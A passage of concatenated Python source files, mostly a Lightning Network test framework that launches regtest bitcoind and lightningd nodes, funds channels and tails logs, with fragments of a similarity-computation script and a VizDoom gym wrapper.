# writing_thread = Process(target=self.write_result, args=(idx1+1, ret_values, ret_indices, START_TARGET_IDX1, RANK_TO_SAVE, filename_to_save, axis))
writing_thread = Process(target=self.write_result, args=(
idx1 + 1, copy.deepcopy(ret_values), copy.deepcopy(ret_indices), START_TARGET_IDX1, RANK_TO_SAVE,
filename_to_save, axis))
writing_thread.start()
log.info('STAGE %d total elapsed time %.2f sec' % (idx1 + 1, time.time() - start1))
if writing_thread is not None:
writing_thread.join()
log.info('similarity iteration done : %.2f secs elapsed' % (time.time() - calc_time))
def sample_mat2(self, idx2):
mat2_sample = self.mat2[self.mat2['MAT2_ITERATION'] == idx2]
self.next_mat2_indices = np.array(mat2_sample[['MAT2_SLICE_IDX', 'FTR_IDX']], dtype=np.int64)
self.next_mat2_values = np.array(mat2_sample['NORMED_RATE'], dtype=np.float64)
def write_result(self, stage, ret_values, ret_indices, start_target_idx1, rank_to_save, filename_to_save, axis=0):
writing_time = time.time()
with open(filename_to_save, 'a') as fw:
if axis == 1:
for user_idx in range(len(ret_values)):
tgt_id = self.target_map1.get(start_target_idx1 + user_idx)
sim_users, sim_scores = [], []
for loop_idx in range(0, len(ret_values[user_idx])):
sim_users.append(self.target_map2.get(ret_indices[user_idx][loop_idx]))
sim_scores.append(ret_values[user_idx][loop_idx])
# fw.write('%s,%s,%.6f' % (tgt_id, self.target_map2.get(ret_indices[user_idx][loop_idx]), ret_values[user_idx][loop_idx]))
fw.write('%s,%s,%s' % (tgt_id, ','.join(sim_users), ','.join(['%.6f' % x for x in sim_scores])))
else:
for user_idx in range(len(ret_values)):
tgt_id = self.target_map1.get(start_target_idx1 + user_idx)
for loop_idx in range(0, len(ret_values[user_idx])):
fw.write('%s,%s,%.6f' % (tgt_id, self.target_map2.get(ret_indices[user_idx][loop_idx]), ret_values[user_idx][loop_idx]))
log.info('STAGE %d result mat %s has been written (%.2f elapsed)' % (
stage, str(ret_values.shape), time.time() - writing_time))
|
utils.py
|
from bitcoin.rpc import RawProxy as BitcoinProxy
from btcproxy import BitcoinRpcProxy
from collections import OrderedDict
from decimal import Decimal
from ephemeral_port_reserve import reserve
from lightning import LightningRpc
import json
import logging
import lzma
import os
import random
import re
import shutil
import sqlite3
import string
import subprocess
import threading
import time
BITCOIND_CONFIG = {
"regtest": 1,
"rpcuser": "rpcuser",
"rpcpassword": "rpcpass",
}
LIGHTNINGD_CONFIG = OrderedDict({
"log-level": "debug",
"cltv-delta": 6,
"cltv-final": 5,
"watchtime-blocks": 5,
"rescan": 1,
'disable-dns': None,
})
with open('config.vars') as configfile:
config = dict([(line.rstrip().split('=', 1)) for line in configfile])
DEVELOPER = os.getenv("DEVELOPER", config['DEVELOPER']) == "1"
EXPERIMENTAL_FEATURES = os.getenv("EXPERIMENTAL_FEATURES", config['EXPERIMENTAL_FEATURES']) == "1"
TIMEOUT = int(os.getenv("TIMEOUT", "60"))
VALGRIND = os.getenv("VALGRIND", config['VALGRIND']) == "1"
SLOW_MACHINE = os.getenv("SLOW_MACHINE", "0") == "1"
def wait_for(success, timeout=TIMEOUT):
start_time = time.time()
interval = 0.25
while not success() and time.time() < start_time + timeout:
time.sleep(interval)
interval *= 2
if interval > 5:
interval = 5
if time.time() > start_time + timeout:
raise ValueError("Error waiting for {}", success)
def write_config(filename, opts, regtest_opts=None, section_name='regtest'):
with open(filename, 'w') as f:
for k, v in opts.items():
f.write("{}={}\n".format(k, v))
if regtest_opts:
f.write("[{}]\n".format(section_name))
for k, v in regtest_opts.items():
f.write("{}={}\n".format(k, v))
def only_one(arr):
"""Many JSON RPC calls return an array; often we only expect a single entry
"""
assert len(arr) == 1
return arr[0]
def sync_blockheight(bitcoind, nodes):
height = bitcoind.rpc.getblockchaininfo()['blocks']
for n in nodes:
wait_for(lambda: n.rpc.getinfo()['blockheight'] == height)
def wait_channel_quiescent(n1, n2):
wait_for(lambda: only_one(only_one(n1.rpc.listpeers(n2.info['id'])['peers'])['channels'])['htlcs'] == [])
wait_for(lambda: only_one(only_one(n2.rpc.listpeers(n1.info['id'])['peers'])['channels'])['htlcs'] == [])
def get_tx_p2wsh_outnum(bitcoind, tx, amount):
"""Get output number of this tx which is p2wsh of amount"""
decoded = bitcoind.rpc.decoderawtransaction(tx, True)
for out in decoded['vout']:
if out['scriptPubKey']['type'] == 'witness_v0_scripthash':
if out['value'] == Decimal(amount) / 10**8:
return out['n']
return None
class TailableProc(object):
"""A monitorable process that we can start, stop and tail.
This is the base class for the daemons. It allows us to directly
tail the processes and react to their output.
"""
def __init__(self, outputDir=None, verbose=True):
self.logs = []
self.logs_cond = threading.Condition(threading.RLock())
self.env = os.environ.copy()
self.running = False
self.proc = None
self.outputDir = outputDir
self.logsearch_start = 0
# Should we be logging lines we read from stdout?
self.verbose = verbose
# A filter function that'll tell us whether to filter out the line (not
# pass it to the log matcher and not print it to stdout).
self.log_filter = lambda line: False
def start(self):
"""Start the underlying process and start monitoring it.
"""
logging.debug("Starting '%s'", " ".join(self.cmd_line))
self.proc = subprocess.Popen(self.cmd_line, stdout=subprocess.PIPE, env=self.env)
self.thread = threading.Thread(target=self.tail)
self.thread.daemon = True
self.thread.start()
self.running = True
def save_log(self):
if self.outputDir:
logpath = os.path.join(self.outputDir, 'log')
with open(logpath, 'w') as f:
for l in self.logs:
f.write(l + '\n')
def stop(self, timeout=10):
self.save_log()
self.proc.terminate()
# Now give it some time to react to the signal
rc = self.proc.wait(timeout)
if rc is None:
self.proc.kill()
self.proc.wait()
self.thread.join()
return self.proc.returncode
def kill(self):
"""Kill process without giving it warning."""
self.proc.kill()
self.proc.wait()
self.thread.join()
def tail(self):
"""Tail the stdout of the process and remember it.
Stores the lines of output produced by the process in
self.logs and signals that a new line was read so that it can
be picked up by consumers.
"""
for line in iter(self.proc.stdout.readline, ''):
if len(line) == 0:
break
if self.log_filter(line.decode('ASCII')):
continue
if self.verbose:
logging.debug("%s: %s", self.prefix, line.decode().rstrip())
with self.logs_cond:
self.logs.append(str(line.rstrip()))
self.logs_cond.notifyAll()
self.running = False
self.proc.stdout.close()
def is_in_log(self, regex, start=0):
"""Look for `regex` in the logs."""
ex = re.compile(regex)
for l in self.logs[start:]:
if ex.search(l):
logging.debug("Found '%s' in logs", regex)
return l
logging.debug("Did not find '%s' in logs", regex)
return None
def wait_for_logs(self, regexs, timeout=TIMEOUT):
"""Look for `regexs` in the logs.
We tail the stdout of the process and look for each regex in `regexs`,
starting from last of the previous waited-for log entries (if any). We
fail if the timeout is exceeded or if the underlying process
exits before all the `regexs` were found.
If timeout is None, no time-out is applied.
"""
logging.debug("Waiting for {} in the logs".format(regexs))
exs = [re.compile(r) for r in regexs]
start_time = time.time()
pos = self.logsearch_start
while True:
if timeout is not None and time.time() > start_time + timeout:
print("Time-out: can't find {} in logs".format(exs))
for r in exs:
if self.is_in_log(r):
print("({} was previously in logs!)".format(r))
raise TimeoutError('Unable to find "{}" in logs.'.format(exs))
elif not self.running:
raise ValueError('Process died while waiting for logs')
with self.logs_cond:
if pos >= len(self.logs):
self.logs_cond.wait(1)
continue
for r in exs.copy():
self.logsearch_start = pos + 1
if r.search(self.logs[pos]):
logging.debug("Found '%s' in logs", r)
exs.remove(r)
break
if len(exs) == 0:
return self.logs[pos]
pos += 1
def wait_for_log(self, regex, timeout=TIMEOUT):
"""Look for `regex` in the logs.
Convenience wrapper for the common case of only seeking a single entry.
"""
return self.wait_for_logs([regex], timeout)
class SimpleBitcoinProxy:
"""Wrapper for BitcoinProxy to reconnect.
Long wait times between calls to the Bitcoin RPC could result in
`bitcoind` closing the connection, so here we just create
throwaway connections. This is easier than to reach into the RPC
library to close, reopen and reauth upon failure.
"""
def __init__(self, btc_conf_file, *args, **kwargs):
self.__btc_conf_file__ = btc_conf_file
def __getattr__(self, name):
if name.startswith('__') and name.endswith('__'):
# Python internal stuff
raise AttributeError
# Create a callable to do the actual call
proxy = BitcoinProxy(btc_conf_file=self.__btc_conf_file__)
def f(*args):
return proxy._call(name, *args)
# Make debuggers show <function bitcoin.rpc.name> rather than <function
# bitcoin.rpc.<lambda>>
f.__name__ = name
return f
class BitcoinD(TailableProc):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
TailableProc.__init__(self, bitcoin_dir, verbose=False)
if rpcport is None:
rpcport = reserve()
self.bitcoin_dir = bitcoin_dir
self.rpcport = rpcport
self.prefix = 'bitcoind'
regtestdir = os.path.join(bitcoin_dir, 'regtest')
if not os.path.exists(regtestdir):
os.makedirs(regtestdir)
self.cmd_line = [
'bitcoind',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-txindex',
'-addresstype=bech32'
]
# For up to and including 0.16.1, this needs to be in main section.
BITCOIND_CONFIG['rpcport'] = rpcport
# For after 0.16.1 (eg. 3f398d7a17f136cd4a67998406ca41a124ae2966), this
# needs its own [regtest] section.
BITCOIND_REGTEST = {'rpcport': rpcport}
self.conf_file = os.path.join(bitcoin_dir, 'bitcoin.conf')
write_config(self.conf_file, BITCOIND_CONFIG, BITCOIND_REGTEST)
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.proxies = []
def start(self):
TailableProc.start(self)
self.wait_for_log("Done loading", timeout=TIMEOUT)
logging.info("BitcoinD started")
def stop(self):
for p in self.proxies:
p.stop()
self.rpc.stop()
return TailableProc.stop(self)
def get_proxy(self):
proxy = BitcoinRpcProxy(self)
self.proxies.append(proxy)
proxy.start()
return proxy
# wait_for_mempool can be used to wait for the mempool before generating blocks:
# True := wait for at least 1 transation
# int > 0 := wait for at least N transactions
# 'tx_id' := wait for one transaction id given as a string
# ['tx_id1', 'tx_id2'] := wait until all of the specified transaction IDs
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generatetoaddress(numblocks, self.rpc.getnewaddress())
def simple_reorg(self, height, shift=0):
"""
Reorganize chain by creating a fork at height=[height] and re-mine all mempool
transactions into [height + shift], where shift >= 0. Returns hashes of generated
blocks.
Note that tx's that become invalid at [height] (because coin maturity, locktime
etc.) are removed from mempool. The length of the new chain will be original + 1
OR original + [shift], whichever is larger.
For example: to push tx's backward from height h1 to h2 < h1, use [height]=h2.
Or to change the txindex of tx's at height h1:
1. A block at height h2 < h1 should contain a non-coinbase tx that can be pulled
forward to h1.
2. Set [height]=h2 and [shift]= h1-h2
"""
hashes = []
fee_delta = 1000000
orig_len = self.rpc.getblockcount()
old_hash = self.rpc.getblockhash(height)
final_len = height + shift if height + shift > orig_len else 1 + orig_len
# TODO: raise error for insane args?
self.rpc.invalidateblock(old_hash)
self.wait_for_log(r'InvalidChainFound: invalid block=.* height={}'.format(height))
memp = self.rpc.getrawmempool()
if shift == 0:
hashes += self.generate_block(1 + final_len - height)
else:
for txid in memp:
# lower priority (to effective feerate=0) so they are not mined
self.rpc.prioritisetransaction(txid, None, -fee_delta)
hashes += self.generate_block(shift)
for txid in memp:
# restore priority so they are mined
self.rpc.prioritisetransaction(txid, None, fee_delta)
hashes += self.generate_block(1 + final_len - (height + shift))
self.wait_for_log(r'UpdateTip: new best=.* height={}'.format(final_len))
return hashes
def getnewaddress(self):
return self.rpc.getnewaddress()
class ElementsD(BitcoinD):
def __init__(self, bitcoin_dir="/tmp/bitcoind-test", rpcport=None):
config = BITCOIND_CONFIG.copy()
if 'regtest' in config:
del config['regtest']
config['chain'] = 'liquid-regtest'
BitcoinD.__init__(self, bitcoin_dir, rpcport)
self.cmd_line = [
'elementsd',
'-datadir={}'.format(bitcoin_dir),
'-printtoconsole',
'-server',
'-logtimestamps',
'-nolisten',
'-validatepegin=0',
'-con_blocksubsidy=5000000000',
]
conf_file = os.path.join(bitcoin_dir, 'elements.conf')
config['rpcport'] = self.rpcport
BITCOIND_REGTEST = {'rpcport': self.rpcport}
write_config(conf_file, config, BITCOIND_REGTEST, section_name='liquid-regtest')
self.conf_file = conf_file
self.rpc = SimpleBitcoinProxy(btc_conf_file=self.conf_file)
self.prefix = 'elementsd'
def generate_block(self, numblocks=1, wait_for_mempool=0):
if wait_for_mempool:
if isinstance(wait_for_mempool, str):
wait_for_mempool = [wait_for_mempool]
if isinstance(wait_for_mempool, list):
wait_for(lambda: all(txid in self.rpc.getrawmempool() for txid in wait_for_mempool))
else:
wait_for(lambda: len(self.rpc.getrawmempool()) >= wait_for_mempool)
# As of 0.16, generate() is removed; use generatetoaddress.
return self.rpc.generate(numblocks)
def getnewaddress(self):
"""Need to get an address and then make it unconfidential
"""
addr = self.rpc.getnewaddress()
info = self.rpc.getaddressinfo(addr)
return info['unconfidential']
class LightningD(TailableProc):
def __init__(self, lightning_dir, bitcoindproxy, port=9735, random_hsm=False, node_id=0):
TailableProc.__init__(self, lightning_dir)
self.executable = 'lightningd/lightningd'
self.lightning_dir = lightning_dir
self.port = port
self.cmd_prefix = []
self.disconnect_file = None
self.rpcproxy = bitcoindproxy
self.opts = LIGHTNINGD_CONFIG.copy()
opts = {
'lightning-dir': lightning_dir,
'addr': '127.0.0.1:{}'.format(port),
'allow-deprecated-apis': 'false',
'network': config.get('TEST_NETWORK', 'regtest'),
'ignore-fee-limits': 'false',
'bitcoin-rpcuser': BITCOIND_CONFIG['rpcuser'],
'bitcoin-rpcpassword': BITCOIND_CONFIG['rpcpassword'],
}
for k, v in opts.items():
self.opts[k] = v
if not os.path.exists(lightning_dir):
os.makedirs(lightning_dir)
# Last 32-bytes of final part of dir -> seed.
seed = (bytes(re.search('([^/]+)/*$', lightning_dir).group(1), encoding='utf-8') + bytes(32))[:32]
if not random_hsm:
with open(os.path.join(lightning_dir, 'hsm_secret'), 'wb') as f:
f.write(seed)
if DEVELOPER:
self.opts['dev-broadcast-interval'] = 1000
self.opts['dev-bitcoind-poll'] = 1
self.prefix = 'lightningd-%d' % (node_id)
def cleanup(self):
# To force blackhole to exit, disconnect file must be truncated!
if self.disconnect_file:
with open(self.disconnect_file, "w") as f:
f.truncate()
@property
def cmd_line(self):
opts = []
for k, v in self.opts.items():
if v is None:
opts.append("--{}".format(k))
elif isinstance(v, list):
for i in v:
opts.append("--{}={}".format(k, i))
else:
opts.append("--{}={}".format(k, v))
return self.cmd_prefix + [self.executable] + opts
def start(self):
self.opts['bitcoin-rpcport'] = self.rpcproxy.rpcport
TailableProc.start(self)
self.wait_for_log("Server started with public key")
logging.info("LightningD started")
def wait(self, timeout=10):
"""Wait for the daemon to stop for up to timeout seconds
Returns the returncode of the process, None if the process did
not return before the timeout triggers.
"""
self.proc.wait(timeout)
return self.proc.returncode
class LightningNode(object):
def __init__(self, daemon, rpc, btc, executor, may_fail=False, may_reconnect=False):
self.rpc = rpc
self.daemon = daemon
self.bitcoin = btc
self.executor = executor
self.may_fail = may_fail
self.may_reconnect = may_reconnect
def connect(self, remote_node):
self.rpc.connect(remote_node.info['id'], '127.0.0.1', remote_node.daemon.port)
def is_connected(self, remote_node):
return remote_node.info['id'] in [p['id'] for p in self.rpc.listpeers()['peers']]
def openchannel(self, remote_node, capacity, addrtype="p2sh-segwit", confirm=True, wait_for_announce=True, connect=True):
addr, wallettxid = self.fundwallet(10 * capacity, addrtype)
if connect and not self.is_connected(remote_node):
self.connect(remote_node)
fundingtx = self.rpc.fundchannel(remote_node.info['id'], capacity)
# Wait for the funding transaction to be in bitcoind's mempool
wait_for(lambda: fundingtx['txid'] in self.bitcoin.rpc.getrawmempool())
if confirm or wait_for_announce:
self.bitcoin.generate_block(1)
if wait_for_announce:
self.bitcoin.generate_block(5)
if confirm or wait_for_announce:
self.daemon.wait_for_log(
r'Funding tx {} depth'.format(fundingtx['txid']))
return {'address': addr, 'wallettxid': wallettxid, 'fundingtx': fundingtx}
def fundwallet(self, sats, addrtype="p2sh-segwit"):
addr = self.rpc.newaddr(addrtype)[addrtype]
txid = self.bitcoin.rpc.sendtoaddress(addr, sats / 10**8)
self.bitcoin.generate_block(1)
self.daemon.wait_for_log('Owning output .* txid {} CONFIRMED'.format(txid))
return addr, txid
def getactivechannels(self):
return [c for c in self.rpc.listchannels()['channels'] if c['active']]
def db_query(self, query, use_copy=True):
orig = os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3")
if use_copy:
copy = os.path.join(self.daemon.lightning_dir, "lightningd-copy.sqlite3")
shutil.copyfile(orig, copy)
db = sqlite3.connect(copy)
else:
db = sqlite3.connect(orig)
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
rows = c.fetchall()
result = []
for row in rows:
result.append(dict(zip(row.keys(), row)))
db.commit()
c.close()
db.close()
return result
# Assumes node is stopped!
def db_manip(self, query):
db = sqlite3.connect(os.path.join(self.daemon.lightning_dir, "lightningd.sqlite3"))
db.row_factory = sqlite3.Row
c = db.cursor()
c.execute(query)
db.commit()
c.close()
db.close()
def start(self):
self.daemon.start()
# Cache `getinfo`, we'll be using it a lot
self.info = self.rpc.getinfo()
# This shortcut is sufficient for our simple tests.
self.port = self.info['binding'][0]['port']
def stop(self, timeout=10):
""" Attempt to do a clean shutdown, but kill if it hangs
"""
# Tell the daemon to stop
try:
# May fail if the process already died
self.rpc.stop()
except Exception:
pass
rc = self.daemon.wait(timeout)
# If it did not stop be more insistent
if rc is None:
rc = self.daemon.stop()
self.daemon.save_log()
self.daemon.cleanup()
if rc != 0 and not self.may_fail:
raise ValueError("Node did not exit cleanly, rc={}".format(rc))
else:
return rc
def restart(self, timeout=10, clean=True):
"""Stop and restart the lightning node.
Keyword arguments:
timeout: number of seconds to wait for a shutdown
clean: whether to issue a `stop` RPC command before killing
"""
if clean:
self.stop(timeout)
else:
self.daemon.stop()
self.start()
def fund_channel(self, l2, amount, wait_for_active=True):
# Give yourself some funds to work with
addr = self.rpc.newaddr()['bech32']
self.bitcoin.rpc.sendtoaddress(addr, (amount + 1000000) / 10**8)
numfunds = len(self.rpc.listfunds()['outputs'])
self.bitcoin.generate_block(1)
wait_for(lambda: len(self.rpc.listfunds()['outputs']) > numfunds)
# Now go ahead and open a channel
num_tx = len(self.bitcoin.rpc.getrawmempool())
tx = self.rpc.fundchannel(l2.info['id'], amount)['tx']
wait_for(lambda: len(self.bitcoin.rpc.getrawmempool()) == num_tx + 1)
self.bitcoin.generate_block(1)
# Hacky way to find our output.
scid = "{}x1x{}".format(self.bitcoin.rpc.getblockcount(),
get_tx_p2wsh_outnum(self.bitcoin, tx, amount))
if wait_for_active:
# We wait until gossipd sees both local updates, as well as status NORMAL,
# so it can definitely route through.
self.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
l2.daemon.wait_for_logs([r'update for channel {}/0 now ACTIVE'
.format(scid),
r'update for channel {}/1 now ACTIVE'
.format(scid),
'to CHANNELD_NORMAL'])
return scid
def subd_pid(self, subd):
"""Get the process id of the given subdaemon, eg channeld or gossipd"""
ex = re.compile(r'lightning_{}.*: pid ([0-9]*),'.format(subd))
# Make sure we get latest one if it's restarted!
for l in reversed(self.daemon.logs):
group = ex.search(l)
if group:
return group.group(1)
raise ValueError("No daemon {} found".format(subd))
def channel_state(self, other):
"""Return the state of the channel to the other node.
Returns None if there is no such peer, or a channel hasn't been funded
yet.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['state']
def get_channel_scid(self, other):
"""Get the short_channel_id for the channel to the other node.
"""
peers = self.rpc.listpeers(other.info['id'])['peers']
if not peers or 'channels' not in peers[0]:
return None
channel = peers[0]['channels'][0]
return channel['short_channel_id']
def is_channel_active(self, chanid):
channels = self.rpc.listchannels()['channels']
active = [(c['short_channel_id'], c['channel_flags']) for c in channels if c['active']]
return (chanid, 0) in active and (chanid, 1) in active
def wait_for_channel_onchain(self, peerid):
txid = only_one(only_one(self.rpc.listpeers(peerid)['peers'])['channels'])['scratch_txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
def wait_channel_active(self, chanid):
wait_for(lambda: self.is_channel_active(chanid))
# This waits until gossipd sees channel_update in both directions
# (or for local channels, at least a local announcement)
def wait_for_channel_updates(self, scids):
# Could happen in any order...
self.daemon.wait_for_logs(['Received channel_update for channel {}/0'.format(c)
for c in scids]
+ ['Received channel_update for channel {}/1'.format(c)
for c in scids])
def wait_for_route(self, destination, timeout=30):
""" Wait for a route to the destination to become available.
"""
start_time = time.time()
while time.time() < start_time + timeout:
try:
self.rpc.getroute(destination.info['id'], 1, 1)
return True
except Exception:
time.sleep(1)
if time.time() > start_time + timeout:
raise ValueError("Error waiting for a route to destination {}".format(destination))
def pay(self, dst, amt, label=None):
if not label:
label = ''.join(random.choice(string.ascii_letters + string.digits) for _ in range(20))
rhash = dst.rpc.invoice(amt, label, label)['payment_hash']
invoices = dst.rpc.listinvoices(label)['invoices']
assert len(invoices) == 1 and invoices[0]['status'] == 'unpaid'
routestep = {
'msatoshi': amt,
'id': dst.info['id'],
'delay': 5,
'channel': '1x1x1'
}
def wait_pay():
# Up to 10 seconds for payment to succeed.
start_time = time.time()
while dst.rpc.listinvoices(label)['invoices'][0]['status'] != 'paid':
if time.time() > start_time + 10:
raise TimeoutError('Payment timed out')
time.sleep(0.1)
# sendpay is async now
self.rpc.sendpay([routestep], rhash)
# wait for sendpay to comply
self.rpc.waitsendpay(rhash)
# Note: this feeds through the smoother in update_feerate, so changing
# it on a running daemon may not give expected result!
def set_feerates(self, feerates, wait_for_effect=True):
# (bitcoind returns bitcoin per kb, so these are * 4)
def mock_estimatesmartfee(r):
params = r['params']
if params == [2, 'CONSERVATIVE']:
feerate = feerates[0] * 4
elif params == [4, 'ECONOMICAL']:
feerate = feerates[1] * 4
elif params == [100, 'ECONOMICAL']:
feerate = feerates[2] * 4
else:
raise ValueError()
return {
'id': r['id'],
'error': None,
'result': {
'feerate': Decimal(feerate) / 10**8
},
}
self.daemon.rpcproxy.mock_rpc('estimatesmartfee', mock_estimatesmartfee)
# Technically, this waits until it's called, not until it's processed.
# We wait until all three levels have been called.
if wait_for_effect:
wait_for(lambda: self.daemon.rpcproxy.mock_counts['estimatesmartfee'] >= 3)
def wait_for_onchaind_broadcast(self, name, resolve=None):
"""Wait for onchaind to drop tx name to resolve (if any)"""
if resolve:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve {}'
.format(name, resolve))
else:
r = self.daemon.wait_for_log('Broadcasting {} .* to resolve '
.format(name))
rawtx = re.search(r'.* \(([0-9a-fA-F]*)\) ', r).group(1)
txid = self.bitcoin.rpc.decoderawtransaction(rawtx, True)['txid']
wait_for(lambda: txid in self.bitcoin.rpc.getrawmempool())
class NodeFactory(object):
"""A factory to setup and start `lightningd` daemons.
"""
def __init__(self, testname, bitcoind, executor, directory):
self.testname = testname
self.next_id = 1
self.nodes = []
self.executor = executor
self.bitcoind = bitcoind
self.directory = directory
self.lock = threading.Lock()
def split_options(self, opts):
"""Split node options from cli options
Some options are used to instrument the node wrapper and some are passed
to the daemon on the command line. Split them so we know where to use
them.
"""
node_opt_keys = [
'disconnect',
'may_fail',
'may_reconnect',
'random_hsm',
'log_all_io',
'feerates',
]
node_opts = {k: v for k, v in opts.items() if k in node_opt_keys}
cli_opts = {k: v for k, v in opts.items() if k not in node_opt_keys}
return node_opts, cli_opts
def get_next_port(self):
with self.lock:
return reserve()
def get_node_id(self):
"""Generate a unique numeric ID for a lightning node
"""
with self.lock:
node_id = self.next_id
self.next_id += 1
return node_id
def get_nodes(self, num_nodes, opts=None):
"""Start a number of nodes in parallel, each with its own options
"""
if opts is None:
# No opts were passed in, give some dummy opts
opts = [{} for _ in range(num_nodes)]
elif isinstance(opts, dict):
# A single dict was passed in, so we use these opts for all nodes
opts = [opts] * num_nodes
assert len(opts) == num_nodes
jobs = []
for i in range(num_nodes):
node_opts, cli_opts = self.split_options(opts[i])
jobs.append(self.executor.submit(
self.get_node, options=cli_opts,
node_id=self.get_node_id(), **node_opts
))
return [j.result() for j in jobs]
def get_node(self, disconnect=None, options=None, may_fail=False,
may_reconnect=False, random_hsm=False,
feerates=(15000, 7500, 3750), start=True, log_all_io=False,
dbfile=None, node_id=None):
if not node_id:
node_id = self.get_node_id()
port = self.get_next_port()
lightning_dir = os.path.join(
self.directory, "lightning-{}/".format(node_id))
if os.path.exists(lightning_dir):
shutil.rmtree(lightning_dir)
socket_path = os.path.join(lightning_dir, "lightning-rpc").format(node_id)
daemon = LightningD(
lightning_dir, bitcoindproxy=self.bitcoind.get_proxy(),
port=port, random_hsm=random_hsm, node_id=node_id
)
# If we have a disconnect string, dump it to a file for daemon.
if disconnect:
daemon.disconnect_file = os.path.join(lightning_dir, "dev_disconnect")
with open(daemon.disconnect_file, "w") as f:
f.write("\n".join(disconnect))
daemon.opts["dev-disconnect"] = "dev_disconnect"
if log_all_io:
assert DEVELOPER
daemon.env["LIGHTNINGD_DEV_LOG_IO"] = "1"
daemon.opts["log-level"] = "io"
if DEVELOPER:
daemon.opts["dev-fail-on-subdaemon-fail"] = None
daemon.env["LIGHTNINGD_DEV_MEMLEAK"] = "1"
if os.getenv("DEBUG_SUBD"):
daemon.opts["dev-debugger"] = os.getenv("DEBUG_SUBD")
if VALGRIND:
daemon.env["LIGHTNINGD_DEV_NO_BACKTRACE"] = "1"
if not may_reconnect:
daemon.opts["dev-no-reconnect"] = None
if options is not None:
daemon.opts.update(options)
rpc = LightningRpc(socket_path, self.executor)
node = LightningNode(daemon, rpc, self.bitcoind, self.executor, may_fail=may_fail,
may_reconnect=may_reconnect)
# Regtest estimatefee are unusable, so override.
node.set_feerates(feerates, False)
self.nodes.append(node)
if VALGRIND:
node.daemon.cmd_prefix = [
'valgrind',
'-q',
'--trace-children=yes',
'--trace-children-skip=*python*,*bitcoin-cli*',
'--error-exitcode=7',
'--log-file={}/valgrind-errors.%p'.format(node.daemon.lightning_dir)
]
if dbfile:
out = open(os.path.join(node.daemon.lightning_dir, 'lightningd.sqlite3'), 'xb')
with lzma.open(os.path.join('tests/data', dbfile), 'rb') as f:
out.write(f.read())
if start:
try:
node.start()
except Exception:
node.daemon.stop()
raise
return node
def line_graph(self, num_nodes, fundchannel=True, fundamount=10**6, wait_for_announce=False, opts=None, announce_channels=True):
""" Create nodes, connect them and optionally fund channels.
"""
assert not (wait_for_announce and not announce_channels), "You've asked to wait for an announcement that's not coming. (wait_for_announce=True,announce_channels=False)"
nodes = self.get_nodes(num_nodes, opts=opts)
bitcoin = nodes[0].bitcoin
connections = [(nodes[i], nodes[i + 1]) for i in range(0, num_nodes - 1)]
for src, dst in connections:
src.rpc.connect(dst.info['id'], 'localhost', dst.port)
# If we're returning now, make sure dst all show connections in
# getpeers.
if not fundchannel:
for src, dst in connections:
dst.daemon.wait_for_log('openingd-{} chan #[0-9]*: Handed peer, entering loop'.format(src.info['id']))
return nodes
# If we got here, we want to fund channels
for src, dst in connections:
addr = src.rpc.newaddr()['bech32']
src.bitcoin.rpc.sendtoaddress(addr, (fundamount + 1000000) / 10**8)
bitcoin.generate_block(1)
for src, dst in connections:
wait_for(lambda: len(src.rpc.listfunds()['outputs']) > 0)
tx = src.rpc.fundchannel(dst.info['id'], fundamount, announce=announce_channels)
wait_for(lambda: tx['txid'] in bitcoin.rpc.getrawmempool())
# Confirm all channels and wait for them to become usable
bitcoin.generate_block(1)
scids = []
for src, dst in connections:
wait_for(lambda: src.channel_state(dst) == 'CHANNELD_NORMAL')
scid = src.get_channel_scid(dst)
src.daemon.wait_for_log(r'Received channel_update for channel {scid}/. now ACTIVE'.format(scid=scid))
scids.append(scid)
if not wait_for_announce:
return nodes
bitcoin.generate_block(5)
def both_dirs_ready(n, scid):
resp = n.rpc.listchannels(scid)
return [a['active'] for a in resp['channels']] == [True, True]
# Make sure everyone sees all channels: we can cheat and
# simply check the ends (since it's a line).
wait_for(lambda: both_dirs_ready(nodes[0], scids[-1]))
wait_for(lambda: both_dirs_ready(nodes[-1], scids[0]))
# Make sure we have all node announcements, too (just check ends)
for n in nodes:
for end in (nodes[0], nodes[-1]):
wait_for(lambda: 'alias' in only_one(end.rpc.listnodes(n.info['id'])['nodes']))
return nodes
def killall(self, expected_successes):
"""Returns true if every node we expected to succeed actually succeeded"""
unexpected_fail = False
for i in range(len(self.nodes)):
leaks = None
# leak detection upsets VALGRIND by reading uninitialized mem.
# If it's dead, we'll catch it below.
if not VALGRIND:
try:
# This also puts leaks in log.
leaks = self.nodes[i].rpc.dev_memleak()['leaks']
except Exception:
pass
try:
self.nodes[i].stop()
except Exception:
if expected_successes[i]:
unexpected_fail = True
if leaks is not None and len(leaks) != 0:
raise Exception("Node {} has memory leaks: {}".format(
self.nodes[i].daemon.lightning_dir,
json.dumps(leaks, sort_keys=True, indent=4)
))
return not unexpected_fail
|
doom_gym.py
|
import copy
import os
import random
import re
import time
from os.path import join
from threading import Thread
import cv2
import gym
import numpy as np
from filelock import FileLock, Timeout
from gym.utils import seeding
from vizdoom.vizdoom import ScreenResolution, DoomGame, Mode, AutomapMode
from sample_factory.algorithms.utils.spaces.discretized import Discretized
from sample_factory.utils.utils import log, project_tmp_dir
def doom_lock_file(max_parallel):
"""
Doom instances tend to have problems starting when a lot of them are initialized in parallel.
This is not a problem during normal execution once the envs are initialized.
The "sweet spot" for the number of envs that can be initialized in parallel is about 5-10.
Here we use file locking mechanism to ensure that only a limited amount of envs are being initialized at the same
time.
This tends to be more of a problem for multiplayer envs.
